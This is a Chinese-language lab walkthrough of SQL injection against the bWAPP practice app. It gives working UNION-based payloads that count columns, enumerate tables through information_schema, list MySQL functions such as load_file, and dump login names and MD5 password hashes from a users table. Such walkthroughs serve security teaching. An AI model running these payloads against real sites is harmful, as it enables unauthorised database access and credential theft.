我们进行测试这里是否存在SQL注入漏洞
输入a'
点击搜索后
报错了,说明很大可能存在SQL注入漏洞了。
order by 语句
输入 a' order by 1 #
输入a' order by 7#
输入a' order by 8#
由此可以判断出,库中有7个列。
使用联合查询注入union
输入a' union select 1,2,3,4,5,6,7#
可以看出是从2开始显示。
可以将2,3,5,4,替换成我们想要查询的信息
system_user() 系统用户名
user() 用户名
current_user 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统
输入a' union select 1,database(),3,4,5,6,7#
可见当前数据库为bwapp
输入a' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#
当前数据库(bwapp)中,有五张表,其中users比较重要。
先查看users表的所有的列的信息
输入a' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#
一共有9列。
其中的login和password,应该是我们有我们想要的东西。
那我们就去查出它们的信息
输入a' union select 1,login,password,4,5,6,7 from users#
获取login信息和password密码
其中密码是经过md5加密,我们需要去解密
页面更新:2024-04-29
本站资料均由网友自行发布提供,仅用于学习交流。如有版权问题,请与我联系,QQ:4156828
© CopyRight 2008-2024 All Rights Reserved. Powered By bs178.com 闽ICP备11008920号-3
闽公网安备35020302034844号